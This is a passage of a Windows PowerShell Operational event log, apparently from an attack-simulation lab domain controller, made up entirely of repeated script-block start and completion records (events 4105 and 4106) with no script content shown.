Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467609
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467608
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467607
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467606
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467605
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467604
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467603
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467602
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467601
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467600
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467599
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467598
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467597
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467596
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467595
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467594
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467593
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467592
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467591
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467590
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467589
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467588
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467587
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467586
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467585
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467584
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467583
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467582
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467581
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467580
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467579
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467578
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467577
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467576
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467575
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467838
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467837
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467836
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467835
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467834
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467833
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467832
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467831
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467830
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467829
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467828
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467827
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467826
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467825
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467824
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467823
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467822
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467821
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467820
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467819
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:07 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
